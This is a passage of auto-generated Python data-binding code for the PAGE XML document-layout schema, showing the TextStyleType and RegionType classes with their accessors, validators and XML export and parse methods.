self.reverseVideo = _cast(bool, reverseVideo)
self.reverseVideo_nsprefix_ = None
self.bold = _cast(bool, bold)
self.bold_nsprefix_ = None
self.italic = _cast(bool, italic)
self.italic_nsprefix_ = None
self.underlined = _cast(bool, underlined)
self.underlined_nsprefix_ = None
self.underlineStyle = _cast(None, underlineStyle)
self.underlineStyle_nsprefix_ = None
self.subscript = _cast(bool, subscript)
self.subscript_nsprefix_ = None
self.superscript = _cast(bool, superscript)
self.superscript_nsprefix_ = None
self.strikethrough = _cast(bool, strikethrough)
self.strikethrough_nsprefix_ = None
self.smallCaps = _cast(bool, smallCaps)
self.smallCaps_nsprefix_ = None
self.letterSpaced = _cast(bool, letterSpaced)
self.letterSpaced_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TextStyleType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TextStyleType.subclass:
return TextStyleType.subclass(*args_, **kwargs_)
else:
return TextStyleType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_fontFamily(self):
return self.fontFamily
def set_fontFamily(self, fontFamily):
self.fontFamily = fontFamily
def get_serif(self):
return self.serif
def set_serif(self, serif):
self.serif = serif
def get_monospace(self):
return self.monospace
def set_monospace(self, monospace):
self.monospace = monospace
def get_fontSize(self):
return self.fontSize
def set_fontSize(self, fontSize):
self.fontSize = fontSize
def get_xHeight(self):
return self.xHeight
def set_xHeight(self, xHeight):
self.xHeight = xHeight
def get_kerning(self):
return self.kerning
def set_kerning(self, kerning):
self.kerning = kerning
def get_textColour(self):
return self.textColour
def set_textColour(self, textColour):
self.textColour = textColour
def get_textColourRgb(self):
return self.textColourRgb
def set_textColourRgb(self, textColourRgb):
self.textColourRgb = textColourRgb
def get_bgColour(self):
return self.bgColour
def set_bgColour(self, bgColour):
self.bgColour = bgColour
def get_bgColourRgb(self):
return self.bgColourRgb
def set_bgColourRgb(self, bgColourRgb):
self.bgColourRgb = bgColourRgb
def get_reverseVideo(self):
return self.reverseVideo
def set_reverseVideo(self, reverseVideo):
self.reverseVideo = reverseVideo
def get_bold(self):
return self.bold
def set_bold(self, bold):
self.bold = bold
def get_italic(self):
return self.italic
def set_italic(self, italic):
self.italic = italic
def get_underlined(self):
return self.underlined
def set_underlined(self, underlined):
self.underlined = underlined
def get_underlineStyle(self):
return self.underlineStyle
def set_underlineStyle(self, underlineStyle):
self.underlineStyle = underlineStyle
def get_subscript(self):
return self.subscript
def set_subscript(self, subscript):
self.subscript = subscript
def get_superscript(self):
return self.superscript
def set_superscript(self, superscript):
self.superscript = superscript
def get_strikethrough(self):
return self.strikethrough
def set_strikethrough(self, strikethrough):
self.strikethrough = strikethrough
def get_smallCaps(self):
return self.smallCaps
def set_smallCaps(self, smallCaps):
self.smallCaps = smallCaps
def get_letterSpaced(self):
return self.letterSpaced
def set_letterSpaced(self, letterSpaced):
self.letterSpaced = letterSpaced
def validate_ColourSimpleType(self, value):
# Validate type pc:ColourSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_UnderlineStyleSimpleType(self, value):
# Validate type pc:UnderlineStyleSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['singleLine', 'doubleLine', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on UnderlineStyleSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextStyleType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextStyleType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'TextStyleType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextStyleType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextStyleType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextStyleType'):
if self.fontFamily is not None and 'fontFamily' not in already_processed:
already_processed.add('fontFamily')
outfile.write(' fontFamily=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.fontFamily), input_name='fontFamily')), ))
if self.serif is not None and 'serif' not in already_processed:
already_processed.add('serif')
outfile.write(' serif="%s"' % self.gds_format_boolean(self.serif, input_name='serif'))
if self.monospace is not None and 'monospace' not in already_processed:
already_processed.add('monospace')
outfile.write(' monospace="%s"' % self.gds_format_boolean(self.monospace, input_name='monospace'))
if self.fontSize is not None and 'fontSize' not in already_processed:
already_processed.add('fontSize')
outfile.write(' fontSize="%s"' % self.gds_format_float(self.fontSize, input_name='fontSize'))
if self.xHeight is not None and 'xHeight' not in already_processed:
already_processed.add('xHeight')
outfile.write(' xHeight="%s"' % self.gds_format_integer(self.xHeight, input_name='xHeight'))
if self.kerning is not None and 'kerning' not in already_processed:
already_processed.add('kerning')
outfile.write(' kerning="%s"' % self.gds_format_integer(self.kerning, input_name='kerning'))
if self.textColour is not None and 'textColour' not in already_processed:
already_processed.add('textColour')
outfile.write(' textColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.textColour), input_name='textColour')), ))
if self.textColourRgb is not None and 'textColourRgb' not in already_processed:
already_processed.add('textColourRgb')
outfile.write(' textColourRgb="%s"' % self.gds_format_integer(self.textColourRgb, input_name='textColourRgb'))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
if self.bgColourRgb is not None and 'bgColourRgb' not in already_processed:
already_processed.add('bgColourRgb')
outfile.write(' bgColourRgb="%s"' % self.gds_format_integer(self.bgColourRgb, input_name='bgColourRgb'))
if self.reverseVideo is not None and 'reverseVideo' not in already_processed:
already_processed.add('reverseVideo')
outfile.write(' reverseVideo="%s"' % self.gds_format_boolean(self.reverseVideo, input_name='reverseVideo'))
if self.bold is not None and 'bold' not in already_processed:
already_processed.add('bold')
outfile.write(' bold="%s"' % self.gds_format_boolean(self.bold, input_name='bold'))
if self.italic is not None and 'italic' not in already_processed:
already_processed.add('italic')
outfile.write(' italic="%s"' % self.gds_format_boolean(self.italic, input_name='italic'))
if self.underlined is not None and 'underlined' not in already_processed:
already_processed.add('underlined')
outfile.write(' underlined="%s"' % self.gds_format_boolean(self.underlined, input_name='underlined'))
if self.underlineStyle is not None and 'underlineStyle' not in already_processed:
already_processed.add('underlineStyle')
outfile.write(' underlineStyle=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.underlineStyle), input_name='underlineStyle')), ))
if self.subscript is not None and 'subscript' not in already_processed:
already_processed.add('subscript')
outfile.write(' subscript="%s"' % self.gds_format_boolean(self.subscript, input_name='subscript'))
if self.superscript is not None and 'superscript' not in already_processed:
already_processed.add('superscript')
outfile.write(' superscript="%s"' % self.gds_format_boolean(self.superscript, input_name='superscript'))
if self.strikethrough is not None and 'strikethrough' not in already_processed:
already_processed.add('strikethrough')
outfile.write(' strikethrough="%s"' % self.gds_format_boolean(self.strikethrough, input_name='strikethrough'))
if self.smallCaps is not None and 'smallCaps' not in already_processed:
already_processed.add('smallCaps')
outfile.write(' smallCaps="%s"' % self.gds_format_boolean(self.smallCaps, input_name='smallCaps'))
if self.letterSpaced is not None and 'letterSpaced' not in already_processed:
already_processed.add('letterSpaced')
outfile.write(' letterSpaced="%s"' % self.gds_format_boolean(self.letterSpaced, input_name='letterSpaced'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextStyleType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('fontFamily', node)
if value is not None and 'fontFamily' not in already_processed:
already_processed.add('fontFamily')
self.fontFamily = value
value = find_attr_value_('serif', node)
if value is not None and 'serif' not in already_processed:
already_processed.add('serif')
if value in ('true', '1'):
self.serif = True
elif value in ('false', '0'):
self.serif = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('monospace', node)
if value is not None and 'monospace' not in already_processed:
already_processed.add('monospace')
if value in ('true', '1'):
self.monospace = True
elif value in ('false', '0'):
self.monospace = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('fontSize', node)
if value is not None and 'fontSize' not in already_processed:
already_processed.add('fontSize')
value = self.gds_parse_float(value, node, 'fontSize')
self.fontSize = value
value = find_attr_value_('xHeight', node)
if value is not None and 'xHeight' not in already_processed:
already_processed.add('xHeight')
self.xHeight = self.gds_parse_integer(value, node, 'xHeight')
value = find_attr_value_('kerning', node)
if value is not None and 'kerning' not in already_processed:
already_processed.add('kerning')
self.kerning = self.gds_parse_integer(value, node, 'kerning')
value = find_attr_value_('textColour', node)
if value is not None and 'textColour' not in already_processed:
already_processed.add('textColour')
self.textColour = value
self.validate_ColourSimpleType(self.textColour) # validate type ColourSimpleType
value = find_attr_value_('textColourRgb', node)
if value is not None and 'textColourRgb' not in already_processed:
already_processed.add('textColourRgb')
self.textColourRgb = self.gds_parse_integer(value, node, 'textColourRgb')
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
value = find_attr_value_('bgColourRgb', node)
if value is not None and 'bgColourRgb' not in already_processed:
already_processed.add('bgColourRgb')
self.bgColourRgb = self.gds_parse_integer(value, node, 'bgColourRgb')
value = find_attr_value_('reverseVideo', node)
if value is not None and 'reverseVideo' not in already_processed:
already_processed.add('reverseVideo')
if value in ('true', '1'):
self.reverseVideo = True
elif value in ('false', '0'):
self.reverseVideo = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('bold', node)
if value is not None and 'bold' not in already_processed:
already_processed.add('bold')
if value in ('true', '1'):
self.bold = True
elif value in ('false', '0'):
self.bold = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('italic', node)
if value is not None and 'italic' not in already_processed:
already_processed.add('italic')
if value in ('true', '1'):
self.italic = True
elif value in ('false', '0'):
self.italic = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('underlined', node)
if value is not None and 'underlined' not in already_processed:
already_processed.add('underlined')
if value in ('true', '1'):
self.underlined = True
elif value in ('false', '0'):
self.underlined = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('underlineStyle', node)
if value is not None and 'underlineStyle' not in already_processed:
already_processed.add('underlineStyle')
self.underlineStyle = value
self.validate_UnderlineStyleSimpleType(self.underlineStyle) # validate type UnderlineStyleSimpleType
value = find_attr_value_('subscript', node)
if value is not None and 'subscript' not in already_processed:
already_processed.add('subscript')
if value in ('true', '1'):
self.subscript = True
elif value in ('false', '0'):
self.subscript = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('superscript', node)
if value is not None and 'superscript' not in already_processed:
already_processed.add('superscript')
if value in ('true', '1'):
self.superscript = True
elif value in ('false', '0'):
self.superscript = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('strikethrough', node)
if value is not None and 'strikethrough' not in already_processed:
already_processed.add('strikethrough')
if value in ('true', '1'):
self.strikethrough = True
elif value in ('false', '0'):
self.strikethrough = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('smallCaps', node)
if value is not None and 'smallCaps' not in already_processed:
already_processed.add('smallCaps')
if value in ('true', '1'):
self.smallCaps = True
elif value in ('false', '0'):
self.smallCaps = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('letterSpaced', node)
if value is not None and 'letterSpaced' not in already_processed:
already_processed.add('letterSpaced')
if value in ('true', '1'):
self.letterSpaced = True
elif value in ('false', '0'):
self.letterSpaced = False
else:
raise_parse_error(node, 'Bad boolean attribute')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class TextStyleType
class RegionType(GeneratedsSuper):
"""For generic use
Is this region a continuation of another region
(in previous column or page, for example)?"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('Roles', 'RolesType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Roles', 'type': 'RolesType'}, None),
MemberSpec_('TextRegion', 'TextRegionType', 1, 1, {'name': 'TextRegion', 'type': 'TextRegionType'}, 7),
MemberSpec_('ImageRegion', 'ImageRegionType', 1, 1, {'name': 'ImageRegion', 'type': 'ImageRegionType'}, 7),
MemberSpec_('LineDrawingRegion', 'LineDrawingRegionType', 1, 1, {'name': 'LineDrawingRegion', 'type': 'LineDrawingRegionType'}, 7),
MemberSpec_('GraphicRegion', 'GraphicRegionType', 1, 1, {'name': 'GraphicRegion', 'type': 'GraphicRegionType'}, 7),
MemberSpec_('TableRegion', 'TableRegionType', 1, 1, {'name': 'TableRegion', 'type': 'TableRegionType'}, 7),
MemberSpec_('ChartRegion', 'ChartRegionType', 1, 1, {'name': 'ChartRegion', 'type': 'ChartRegionType'}, 7),
MemberSpec_('SeparatorRegion', 'SeparatorRegionType', 1, 1, {'name': 'SeparatorRegion', 'type': 'SeparatorRegionType'}, 7),
MemberSpec_('MathsRegion', 'MathsRegionType', 1, 1, {'name': 'MathsRegion', 'type': 'MathsRegionType'}, 7),
MemberSpec_('ChemRegion', 'ChemRegionType', 1, 1, {'name': 'ChemRegion', 'type': 'ChemRegionType'}, 7),
MemberSpec_('MusicRegion', 'MusicRegionType', 1, 1, {'name': 'MusicRegion', 'type': 'MusicRegionType'}, 7),
MemberSpec_('AdvertRegion', 'AdvertRegionType', 1, 1, {'name': 'AdvertRegion', 'type': 'AdvertRegionType'}, 7),
MemberSpec_('NoiseRegion', 'NoiseRegionType', 1, 1, {'name': 'NoiseRegion', 'type': 'NoiseRegionType'}, 7),
MemberSpec_('UnknownRegion', 'UnknownRegionType', 1, 1, {'name': 'UnknownRegion', 'type': 'UnknownRegionType'}, 7),
MemberSpec_('CustomRegion', 'CustomRegionType', 1, 1, {'name': 'CustomRegion', 'type': 'CustomRegionType'}, 7),
]
subclass = None
superclass = None
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, extensiontype_=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.continuation = _cast(bool, continuation)
self.continuation_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
self.Roles = Roles
self.Roles_nsprefix_ = "pc"
if TextRegion is None:
self.TextRegion = []
else:
self.TextRegion = TextRegion
self.TextRegion_nsprefix_ = "pc"
if ImageRegion is None:
self.ImageRegion = []
else:
self.ImageRegion = ImageRegion
self.ImageRegion_nsprefix_ = "pc"
if LineDrawingRegion is None:
self.LineDrawingRegion = []
else:
self.LineDrawingRegion = LineDrawingRegion
self.LineDrawingRegion_nsprefix_ = "pc"
if GraphicRegion is None:
self.GraphicRegion = []
else:
self.GraphicRegion = GraphicRegion
self.GraphicRegion_nsprefix_ = "pc"
if TableRegion is None:
self.TableRegion = []
else:
self.TableRegion = TableRegion
self.TableRegion_nsprefix_ = "pc"
if ChartRegion is None:
self.ChartRegion = []
else:
self.ChartRegion = ChartRegion
self.ChartRegion_nsprefix_ = "pc"
if SeparatorRegion is None:
self.SeparatorRegion = []
else:
self.SeparatorRegion = SeparatorRegion
self.SeparatorRegion_nsprefix_ = "pc"
if MathsRegion is None:
self.MathsRegion = []
else:
self.MathsRegion = MathsRegion
self.MathsRegion_nsprefix_ = "pc"
if ChemRegion is None:
self.ChemRegion = []
else:
self.ChemRegion = ChemRegion
self.ChemRegion_nsprefix_ = "pc"
if MusicRegion is None:
self.MusicRegion = []
else:
self.MusicRegion = MusicRegion
self.MusicRegion_nsprefix_ = "pc"
if AdvertRegion is None:
self.AdvertRegion = []
else:
self.AdvertRegion = AdvertRegion
self.AdvertRegion_nsprefix_ = "pc"
if NoiseRegion is None:
self.NoiseRegion = []
else:
self.NoiseRegion = NoiseRegion
self.NoiseRegion_nsprefix_ = "pc"
if UnknownRegion is None:
self.UnknownRegion = []
else:
self.UnknownRegion = UnknownRegion
self.UnknownRegion_nsprefix_ = "pc"
if CustomRegion is None:
self.CustomRegion = []
else:
self.CustomRegion = CustomRegion
self.CustomRegion_nsprefix_ = "pc"
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, RegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if RegionType.subclass:
return RegionType.subclass(*args_, **kwargs_)
else:
return RegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_AlternativeImage(self):
return self.AlternativeImage
def set_AlternativeImage(self, AlternativeImage):
self.AlternativeImage = AlternativeImage
def add_AlternativeImage(self, value):
self.AlternativeImage.append(value)
def insert_AlternativeImage_at(self, index, value):
self.AlternativeImage.insert(index, value)
def replace_AlternativeImage_at(self, index, value):
self.AlternativeImage[index] = value
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_Roles(self):
return self.Roles
def set_Roles(self, Roles):
self.Roles = Roles
def get_TextRegion(self):
return self.TextRegion
def set_TextRegion(self, TextRegion):
self.TextRegion = TextRegion
def add_TextRegion(self, value):
self.TextRegion.append(value)
def insert_TextRegion_at(self, index, value):
self.TextRegion.insert(index, value)
def replace_TextRegion_at(self, index, value):
self.TextRegion[index] = value
def get_ImageRegion(self):
return self.ImageRegion
def set_ImageRegion(self, ImageRegion):
self.ImageRegion = ImageRegion
def add_ImageRegion(self, value):
self.ImageRegion.append(value)
def insert_ImageRegion_at(self, index, value):
self.ImageRegion.insert(index, value)
def replace_ImageRegion_at(self, index, value):
self.ImageRegion[index] = value
def get_LineDrawingRegion(self):
return self.LineDrawingRegion
def set_LineDrawingRegion(self, LineDrawingRegion):
self.LineDrawingRegion = LineDrawingRegion
def add_LineDrawingRegion(self, value):
self.LineDrawingRegion.append(value)
def insert_LineDrawingRegion_at(self, index, value):
self.LineDrawingRegion.insert(index, value)
def replace_LineDrawingRegion_at(self, index, value):
self.LineDrawingRegion[index] = value
def get_GraphicRegion(self):
return self.GraphicRegion
def set_GraphicRegion(self, GraphicRegion):
self.GraphicRegion = GraphicRegion
def add_GraphicRegion(self, value):
self.GraphicRegion.append(value)
def insert_GraphicRegion_at(self, index, value):
self.GraphicRegion.insert(index, value)
def replace_GraphicRegion_at(self, index, value):
self.GraphicRegion[index] = value
def get_TableRegion(self):
return self.TableRegion
def set_TableRegion(self, TableRegion):
self.TableRegion = TableRegion
def add_TableRegion(self, value):
self.TableRegion.append(value)
def insert_TableRegion_at(self, index, value):
self.TableRegion.insert(index, value)
def replace_TableRegion_at(self, index, value):
self.TableRegion[index] = value
def get_ChartRegion(self):
return self.ChartRegion
def set_ChartRegion(self, ChartRegion):
self.ChartRegion = ChartRegion
def add_ChartRegion(self, value):
self.ChartRegion.append(value)
def insert_ChartRegion_at(self, index, value):
self.ChartRegion.insert(index, value)
def replace_ChartRegion_at(self, index, value):
self.ChartRegion[index] = value
def get_SeparatorRegion(self):
return self.SeparatorRegion
def set_SeparatorRegion(self, SeparatorRegion):
self.SeparatorRegion = SeparatorRegion
def add_SeparatorRegion(self, value):
self.SeparatorRegion.append(value)
def insert_SeparatorRegion_at(self, index, value):
self.SeparatorRegion.insert(index, value)
def replace_SeparatorRegion_at(self, index, value):
self.SeparatorRegion[index] = value
def get_MathsRegion(self):
return self.MathsRegion
def set_MathsRegion(self, MathsRegion):
self.MathsRegion = MathsRegion
def add_MathsRegion(self, value):
self.MathsRegion.append(value)
def insert_MathsRegion_at(self, index, value):
self.MathsRegion.insert(index, value)
def replace_MathsRegion_at(self, index, value):
self.MathsRegion[index] = value
def get_ChemRegion(self):
return self.ChemRegion
def set_ChemRegion(self, ChemRegion):
self.ChemRegion = ChemRegion
def add_ChemRegion(self, value):
self.ChemRegion.append(value)
def insert_ChemRegion_at(self, index, value):
self.ChemRegion.insert(index, value)
def replace_ChemRegion_at(self, index, value):
self.ChemRegion[index] = value
def get_MusicRegion(self):
return self.MusicRegion
def set_MusicRegion(self, MusicRegion):
self.MusicRegion = MusicRegion
def add_MusicRegion(self, value):
self.MusicRegion.append(value)
def insert_MusicRegion_at(self, index, value):
self.MusicRegion.insert(index, value)
def replace_MusicRegion_at(self, index, value):
self.MusicRegion[index] = value
def get_AdvertRegion(self):
return self.AdvertRegion
def set_AdvertRegion(self, AdvertRegion):
self.AdvertRegion = AdvertRegion
def add_AdvertRegion(self, value):
self.AdvertRegion.append(value)
def insert_AdvertRegion_at(self, index, value):
self.AdvertRegion.insert(index, value)
def replace_AdvertRegion_at(self, index, value):
self.AdvertRegion[index] = value
def get_NoiseRegion(self):
return self.NoiseRegion
def set_NoiseRegion(self, NoiseRegion):
self.NoiseRegion = NoiseRegion
def add_NoiseRegion(self, value):
self.NoiseRegion.append(value)
def insert_NoiseRegion_at(self, index, value):
self.NoiseRegion.insert(index, value)
def replace_NoiseRegion_at(self, index, value):
self.NoiseRegion[index] = value
def get_UnknownRegion(self):
return self.UnknownRegion
def set_UnknownRegion(self, UnknownRegion):
self.UnknownRegion = UnknownRegion
def add_UnknownRegion(self, value):
self.UnknownRegion.append(value)
def insert_UnknownRegion_at(self, index, value):
self.UnknownRegion.insert(index, value)
def replace_UnknownRegion_at(self, index, value):
self.UnknownRegion[index] = value
def get_CustomRegion(self):
return self.CustomRegion
def set_CustomRegion(self, CustomRegion):
self.CustomRegion = CustomRegion
def add_CustomRegion(self, value):
self.CustomRegion.append(value)
def insert_CustomRegion_at(self, index, value):
self.CustomRegion.insert(index, value)
def replace_CustomRegion_at(self, index, value):
self.CustomRegion[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def get_continuation(self):
return self.continuation
def set_continuation(self, continuation):
self.continuation = continuation
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.UserDefined is not None or
self.Labels or
self.Roles is not None or
self.TextRegion or
self.ImageRegion or
self.LineDrawingRegion or
self.GraphicRegion or
self.TableRegion or
self.ChartRegion or
self.SeparatorRegion or
self.MathsRegion or
self.ChemRegion or
self.MusicRegion or
self.AdvertRegion or
self.NoiseRegion or
self.UnknownRegion or
self.CustomRegion
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'RegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
if self.continuation is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
if ":" not in self.extensiontype_:
imported_ns_type_prefix_ = GenerateDSNamespaceTypePrefixes_.get(self.extensiontype_, '')
outfile.write(' xsi:type="%s%s"' % (imported_ns_type_prefix_, self.extensiontype_))
else:
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='RegionType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
